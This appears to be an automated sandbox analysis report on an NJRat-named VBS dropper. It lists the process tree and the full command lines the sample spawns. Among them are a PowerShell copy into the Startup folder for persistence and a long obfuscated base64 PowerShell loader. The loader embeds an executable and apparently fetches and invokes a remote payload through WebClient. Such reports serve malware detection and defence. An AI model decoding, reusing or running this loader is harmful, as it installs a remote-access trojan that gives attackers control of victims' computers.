Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NJratccccassssG2.00.vbs"
Imagebase:	0x7ff6f8410000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 4560, Parent PID: 6576

General

Target ID:	1
Start time:	06:49:06
Start date:	21/02/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Imagebase:	0x7ff744280000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 4960, Parent PID: 4560

General

Target ID:	2
Start time:	06:49:06
Start date:	21/02/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: PING.EXEPID: 3732, Parent PID: 4560

General

Target ID:	5
Start time:	06:49:07
Start date:	21/02/2022
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping 127.0.0.1 -n 10
Imagebase:	0x7ff779ac0000
File size:	21504 bytes
MD5 hash:	6A7389ECE70FB97BFE9A570DB4ACCC3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exePID: 6844, Parent PID: 4560

General

Target ID:	12
Start time:	06:49:16
Start date:	21/02/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: powershell.exePID: 5608, Parent PID: 6576

General

Target ID:	13
Start time:	06:49:24
Start date:	21/02/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? QBwbzM?? ?? ?? oUGI0X?? ?? ?? BJRYJch0B?? H?? oLg?? ?? CqIlFwgoM?? ?? ?? CqJvN?? ?? ?? CiYqNgIDKDU?? ?? ?? ooNg?? ?? Cioe?? ig3?? ?? ?? KKi7QCQ?? ?? ?? igi?? ?? ?? KKh4CKDg?? ?? ?? oq?? ?? ?? ?? Ez?? B?? BQ?? ?? ?? ?? C?? ?? ?? R?? owF?? ?? ?? bLQgo?? Q?? ?? Kwor?? gIKBioi?? /4VBQ?? ?? Gyoe?? ign?? ?? ?? KKg?? ?? ?? BMw?? g?? o?? ?? ?? ?? ?? w?? ?? EQJ7Og?? ?? Cm87?? ?? ?? KCgaMC?? ?? ?? Gy0SK?? I?? ?? CsK?? ns6?? ?? ?? KBm88?? ?? ?? KBipK?? ign?? ?? ?? K?? nM9?? ?? ?? KfTo?? ?? ?? oq?? EJTSkIB?? ?? E?? ?? ?? ?? ?? ?? ?? w?? ?? ?? B2NC4wLjMwMzE5?? ?? ?? ?? ?? ?? U?? b?? ?? ?? ?? MwH?? ?? ?? jfg?? ?? O?? g?? ?? BQI?? ?? ?? jU3RyaW5ncw?? ?? ?? ?? BME?? ?? ?? O?? E?? ?? CNVUwCEEQ?? ?? E?? ?? ?? ?? CNHVUlE?? ?? ?? ?? lBE?? ?? CQE?? ?? ?? jQmxvYg?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? BVxWiCQkP?? ?? ?? ?? +gEz?? BY?? ?? ?? E?? ?? ?? ?? u?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? Z?? ?? ?? ?? BQ?? ?? ?? D0?? ?? ?? B?? ?? ?? ?? ?? ?? w?? ?? ?? ?? U?? ?? ?? ?? J?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? B?? ?? ?? ?? ?? w?? ?? ?? ?? E?? ?? ?? ?? C?? ?? ?? ?? ?? w?? ?? ?? ?? I?? ?? ?? ?? ?? ?? IkE?? Q?? ?? ?? ?? ?? ?? BgBC?? 98GBgCv?? 98GBg?? Z?? i?? GDwBDBw?? ?? BgBa?? ioFBg?? l?? yoFBgCW?? yoFBgBi?? yoFBgB7?? yoFBgCh?? ioFBgBG?? pkGBgDC?? ZkGBgDt?? ioFBgC8?? gYECgDl?? d?? FCgCS?? XMECg?? t?? nMEDgBf?? W8GDg?? ?? BjMGBgDV?? i?? GDgBx?? rgGDgCJ?? ns?? BgCYB5YEDgDsBW8GDg?? K?? 3s?? Bg?? n?? ZYEDg?? B?? EkECgDQ?? akEBgD8?? S?? GBgCn?? d8GBgD?? Bf8GBgBHBRUFCgBv?? Q?? FBg?? ?? ?? ZYEBgD4ByoFCgB6?? Q?? FCgD?? B6kHBgD9?? 9IHDgBSB3s?? BgBCBJYEBgDGBJYEBgDKB5YEBg?? 8BSoFBgBU?? SoFBgCCB98GBg?? JBpYE?? ?? ?? ?? ?? Dc?? ?? ?? ?? ?? ?? ?? E?? ?? Q?? ?? ?? ?? ?? ?? 8gToB0k?? ?? Q?? B?? ?? ?? ?? ?? ?? D+BegHTQ?? B?? ?? I?? ?? ?? EQ?? J8H6?? dd?? ?? E?? ?? w?? ?? ?? Q?? ?? H?? cQB10?? BQ?? I?? ?? ?? BE?? BnB+gHhQ?? H?? ?? s?? ?? ?? E?? ?? ?? EI6?? dd?? ?? g?? Dg?? B?? ?? ?? ?? 8?? NTBV0?? C?? ?? P?? ?? UB?? ?? BhBg?? ?? XQ?? I?? BE?? BQE?? ?? B?? ?? ?? ?? Bd?? ?? g?? G?? ?? x?? IUFJgEx?? FwFLgEx?? H?? FNgEx?? J4FPgER?? J0ERgER?? EQBSgER?? NQ?? TwEh?? N4H9wBQI?? ?? ?? ?? ?? ?? GGBMGBg?? B?? Fgg?? ?? ?? ?? ?? ?? YYEwYG?? ?? E?? YC?? ?? ?? ?? ?? ?? ERgZBlMB?? QCKI?? ?? ?? ?? ?? ?? TCPEFVwEB?? JYg?? ?? ?? ?? ?? BMI4gRc?? QE?? oi?? ?? ?? ?? ?? ?? EwjoBWEB?? QCuI?? ?? ?? ?? ?? ?? TCFEGZgEB?? Log?? ?? ?? ?? ?? BMIv?? Vr?? QE?? 7C?? ?? ?? ?? ?? ?? Ewgs?? X?? B?? QDzI?? ?? ?? ?? ?? ?? TCDgBdgEB?? Psg?? ?? ?? ?? ?? BEYGQZT?? QI?? ESE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? ZIQ?? ?? ?? ?? ?? WCLQHfQEC?? C?? h?? ?? ?? ?? ?? BMIWgd9?? QI?? JyE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? wIQ?? ?? ?? ?? ?? W?? Gk?? ggEC?? PMh?? ?? ?? ?? ?? MYCewfL?? ?? M?? ?? SI?? ?? ?? ?? ?? xgLt?? N?? ?? B?? ?? JIg?? ?? ?? ?? CD?? CQBhwEE?? BUi?? ?? ?? ?? ?? MYCQ?? TU?? ?? Q?? ICI?? ?? ?? ?? ?? EQBW?? IwBB?? B?? Ig?? ?? ?? ?? ?? B?? EI?? l?? EF?? Eki?? ?? ?? ?? ?? ?? YYEwYG?? ?? Y?? VCI?? ?? ?? ?? ?? ?? wjE?? Eo?? BgCIIg?? ?? ?? ?? ?? GGBMGBg?? G?? ?? ?? ?? ?? QDq?? w?? ?? ?? Q?? r?? ?? ?? ?? ?? QBRBQ?? ?? ?? QDk?? ?? ?? ?? ?? QDk?? ?? k?? EwYB?? BE?? EwYG?? Bk?? EwYK?? Ck?? EwYQ?? DE?? EwYQ?? Dk?? EwYQ?? EE?? EwYQ?? Ek?? EwYQ?? FE?? EwYQ?? Fk?? EwYV?? GE?? EwYQ?? Gk?? EwYQ?? HE?? EwYQ?? Hk?? EwYa?? Ik?? EwYg?? KE?? EwYG?? Kk?? EwYG?? LE?? EwYG?? Mk?? EwYm?? OE?? EwYQ?? Ok?? EwYG?? PE?? EwYG?? JE?? EwYG?? Jk?? EwYG?? ?? w?? EwYG?? BQ?? EwYG?? Bw?? EwYG?? CQ?? EwYG?? ?? w?? x?? BK?? BQ?? x?? BK?? Bw?? x?? BK?? CQ?? x?? BK?? Lk?? cgdP?? NE?? EgFV?? NE?? 9?? dd?? Pk?? EwZj?? CEBlgBr?? ?? kBEwYG?? Lk?? EwYG?? CkBEwYG?? DEBLgB7?? CkB+QOB?? DkBhwGI?? CkBMQSN?? EEBrQCS?? EEBkQeY?? EkB0?? Se?? FEBI?? Sk?? EkBkQCq?? BkBJ?? Gy?? NE?? owC4?? GEB+QC/?? GkB4QPG?? Lk?? ewfL?? Lk?? 7QDQ?? Lk?? Q?? TU?? HEBtQDg?? DQ?? 3gf3?? Dw?? zQNK?? Dw?? 1wMO?? Tw?? EwYG?? Ck?? owDM?? y4?? CwDF?? S4?? EwDO?? S4?? GwDt?? S4?? IwD2?? S4?? KwD2?? S4?? MwD2?? S4?? OwD2?? S4?? Qw?? E?? i4?? Sw?? c?? i4?? Uw?? c?? i4?? Ww?? i?? i4?? YwBM?? i4?? awBZ?? k?? ?? gwCn?? k?? ?? ewCs?? kM?? cwC1?? kM?? ewCs?? kk?? owDd?? 2M?? cwC1?? mM?? ewCs?? mk?? owDx?? 4?? ?? gwCn?? oM?? iwCn?? oM?? kwCn?? oM?? cwC1?? ok?? owD+?? 6?? ?? gwCn?? qM?? iwCn?? qM?? cwDO?? qM?? qwCn?? qM?? swCn?? qM?? kwCn?? qk?? ewDt?? c?? ?? gwCn?? sM?? swCn?? sM?? cw?? Q?? 8M?? ewDt?? ck?? ewDt?? e?? ?? gwCn?? uM?? iwCn?? uM?? kwCn?? uM?? qwCn?? uM?? swCn?? gkBow?? SBCMBewCs?? iMBmwBq?? 0MBewCs?? kMBUw?? c?? i?? CewCs?? i?? CgwCn?? k?? CewCs?? k?? CgwCn?? m?? CewCs?? m?? CgwCn?? o?? CewCs?? o?? CgwCn?? q?? CgwCn?? s?? CgwCn?? u?? CgwCn?? u?? CewCs?? g?? DgwCn?? i?? DgwCn?? i?? DewCs?? nQ?? 2?? Dr?? ?? Q?? ?? Q?? F?? ?? U?? Bg?? H?? ?? c?? C?? ?? K?? ?? k?? ?? ?? ?? ?? BpwB?? ?? D0BKEB?? ?? DsBaYB?? ?? BjBqsB?? ?? D?? Bb?? B?? ?? BM?? bUB?? ?? C4B7sB?? ?? BpB7sB?? ?? DI?? M?? B?? g?? E?? ?? M?? ?? g?? F?? ?? U?? ?? g?? G?? ?? c?? ?? g?? H?? ?? k?? ?? g?? I?? ?? s?? ?? g?? J?? ?? 0?? ?? Q?? K?? ?? 0?? ?? g?? N?? ?? 8?? ?? g?? O?? BE?? ?? g?? Y?? BM?? Lg?? 1?? Dw?? QwDd?? P?? ?? /w?? G?? QS?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FMF?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? U?? XI?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BQBlgQ?? ?? ?? ?? ?? Cg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? HQF7?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? CYH?? ?? ?? J?? ?? Q?? Cg?? E?? ?? ?? ?? E?? ?? U?? E?? ?? ?? ?? ?? Q?? Cs?? Q?? ?? ?? ?? ?? ?? ?? LQB?? ?? HM?? 5gBz?? ?? kB?? ?? ?? ?? Q29udGV4dFZhbHVlYDE?? VGhyZWFkU2FmZU9iamVjdFByb3ZpZGVyYDE?? XzU?? Z2V0X1VURjg?? PE1vZHVsZT4?? V?? BEaXNwb3NlX19JbnN0YW5jZV9f?? ENyZWF0ZV9fSW5zdGFuY2VfXwBVRHNTaURiYgBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWM?? TG9hZ?? BTeW5jaHJvbml6ZWQ?? R2V0TWV0aG9k?? FJlcGxhY2U?? Q3JlYXRlSW5zdGFuY2U?? Z2V0X0dldEluc3RhbmNl?? GRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2U?? UnVudGltZVR5cGVIYW5kbGU?? R2V0VHlwZUZyb21IYW5kbGU?? R2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmU?? TWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2U?? QXBwbGljYXRpb25TZXR0aW5nc0Jhc2U?? U3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRl?? EhlbHBLZXl3b3JkQXR0cmlidXRl?? EdlbmVyYXRlZENvZGVBdHRyaWJ1dGU?? RGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRl?? EVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRl?? EFzc2VtYmx5VGl0bGVBdHRyaWJ1dGU?? U3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGU?? SGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGU?? QXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGU?? VGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRl?? ERlYnVnZ2VySGlkZGVuQXR0cmlidXRl?? EFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGU?? TXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGU?? QXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRl?? EFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGU?? UnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGU?? Z2V0X1ZhbHVl?? HNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBVR2x5bXpVZwBzZXRfRW5jb2Rpbmc?? U3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5n?? ERvd25sb2FkU3RyaW5n?? FRvU3RyaW5n?? E1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFs?? FN5c3RlbS5Db21wb25lbnRNb2Rlb?? BscE9VcGxNcC5kbGw?? U3lzdGVt?? HJlc291cmNlTWFu?? FN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24?? QXBwRG9tYWlu?? GdldF9DdXJyZW50RG9tYWlu?? GdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9u?? FN5c3RlbS5Db25maWd1cmF0aW9u?? FN5c3RlbS5HbG9iYWxpemF0aW9u?? FN5c3RlbS5SZWZsZWN0aW9u?? E1ldGhvZEluZm8?? Q3VsdHVyZUluZm8?? bHBPVXBsTX?? ?? bV9BcHBPYmplY3RQcm92aWRlcgBtX1VzZXJPYmplY3RQcm92aWRlcgBtX0NvbXB1dGVyT2JqZWN0UHJvdmlkZXI?? bV9NeVdlYlNlcnZpY2VzT2JqZWN0UHJvdmlkZXI?? Z2V0X1Jlc291cmNlTWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXI?? TXlDb21wdXRlcgBBY3RpdmF0b3I?? LmN0b3I?? LmNjdG9y?? FN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXM?? TXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM?? TWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXM?? U3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2Vz?? GxwT1VwbE1wLk15LlJlc291cmNlcwBscE9VcGxNcC5SZXNvdXJjZXMucmVzb3VyY2Vz?? ERlYnVnZ2luZ01vZGVz?? FN0cmluZ3M?? Z2V0X1NldHRpbmdz?? E15U2V0dGluZ3M?? UmVmZXJlbmNlRXF1YWxz?? FJ1bnRpbWVIZWxwZXJz?? ENvbmNhd?? BPYmplY3Q?? TXlQcm9qZWN0?? FN5c3RlbS5OZXQ?? Z2V0X0RlZmF1bHQ?? V2ViQ2xpZW50?? ENvbnZlcnQ?? U3lzdGVtLlRleHQ?? bV9Db250ZXh0?? GxwT1VwbE1wLk15?? GdldF9Bc3NlbWJseQBNeVNldHRpbmdzUHJvcGVydHk?? ?? CVs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBS?? GU?? cwBv?? HU?? cgBj?? GU?? cw?? ?? V3Q?? e?? B0?? C4?? N?? ?? v?? H?? ?? bQB1?? HI?? Lw?? x?? DU?? Mg?? u?? Dc?? Nw?? x?? C4?? M?? ?? 1?? C4?? O?? ?? 5?? DE?? Q?? Bu?? G8?? d?? Bj?? GU?? d?? Bl?? GQ?? bwBu?? C8?? Lw?? 6?? H?? ?? d?? B0?? Gg?? ?? ?? VIJhEm?? QNB?? ?? BFawBy?? G8?? dwBl?? G0?? YQBy?? EY?? X?? BU?? EU?? Tg?? u?? HQ?? ZgBv?? HM?? bwBy?? GM?? aQBN?? Fw?? cwB3?? G8?? Z?? Bu?? Gk?? VwBc?? Do?? Qw?? ?? Fzk?? MQ?? z?? D?? ?? Mw?? u?? D?? ?? Lg?? 0?? HY?? X?? ?? ?? I2o?? SQBD?? HU?? Z?? BI?? E8?? T?? ?? u?? Ec?? WgBu?? G4?? SwBv?? Fc?? Yw?? ?? EXo?? egBH?? HY?? d?? Bw?? GI?? bw?? ?? GVw?? UgBl?? Gc?? UwB2?? GM?? cw?? u?? GU?? e?? Bl?? ?? ?? ?? hFFgqWcwdE6wlnV8YWFE?? g?? EI?? EBC?? Mg?? ?? EFI?? EBEREEI?? EBDgQg?? QECBS?? C?? Q4OBS?? B?? RFBBy?? E?? Q4ODg4GFRIo?? RIMBhUSK?? ESC?? YVEigBEmEGFRIo?? RIkBC?? ?? Ew?? F?? ?? ICHBwH?? ?? ESaRG?? iQUg?? BK?? jQcg?? gEOEoCNC?? ?? BEoCREoCRBgcEDg4ODgU?? ?? BK?? mQYg?? QESgJkE?? ?? EODgQg?? Q4OBS?? CDg4OBQ?? CDg4OBQ?? ?? EoClBQ?? BHQUOBy?? BEoCNHQUFI?? ESaQ4GI?? ESgK0OBi?? CHBwdH?? Q?? ?? RwcBC?? B?? hwDI?? ?? I?? y?? ?? DgQH?? R4?? ?? h4?? BR?? B?? B4?? B?? oBHg?? EBwET?? ?? YVEigBEw?? HBhUSbQET?? ?? YVEm0BEw?? CEw?? ECgET?? ?? Ug?? QET?? ?? i3elxWGTTgiQiwP19/EdUKOgcGFRIo?? RIMBwYVEigBEggHBhUSK?? ESYQcGFRIo?? RIk?? wYSfQQGEoCB?? wYSG?? M?? ?? ?? EE?? ?? ?? SD?? Q?? ?? BIIB?? ?? ?? EmEE?? ?? ?? SJ?? Q?? ?? BJ9BQ?? ?? EoCBBg?? B?? RK?? gQQ?? ?? BIYB?? ?? B?? Q4EI?? ?? SaQcQ?? QEe?? B4?? Bz?? B?? QEQHg?? EC?? ?? SD?? QI?? BIIB?? g?? EmEEC?? ?? SJ?? QI?? BJ9BQg?? EoCBB?? g?? EhgEK?? ?? T?? ?? gB?? ?? g?? ?? ?? ?? ?? ?? B4B?? ?? E?? V?? IWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEI?? Q?? C?? ?? ?? ?? ?? ?? ?? N?? Q?? IbHBPVXBsTX?? ?? ?? BcB?? BJDb3B5cmlnaHQgwqkgIDIwMjI?? ?? ?? UB?? ?? ?? ?? ?? CkB?? CRhMTU5NDFlMy03ZDM4LTQwYmEtYmI5MC1mYTE5YTZjNjg1NmI?? ?? ?? wB?? ?? cxLj?? uMC4w?? ?? BN?? Q?? cLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMQE?? V?? 4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjEE?? Q?? ?? ?? ?? gB?? ?? E?? ?? ?? ?? ?? ?? BgB?? ?? pNeVRlbXBsYXRlCDExLj?? uMC4w?? ?? BB?? Q?? zU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE3Lj?? uMC4w?? ?? BZ?? QBLTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5FZGl0b3JzLlNldHRpbmdzRGVzaWduZXIuU2V0dGluZ3NTaW5nbGVGaWxlR2VuZXJhdG9yCDE3Lj?? uMy4w?? ?? Bh?? Q?? 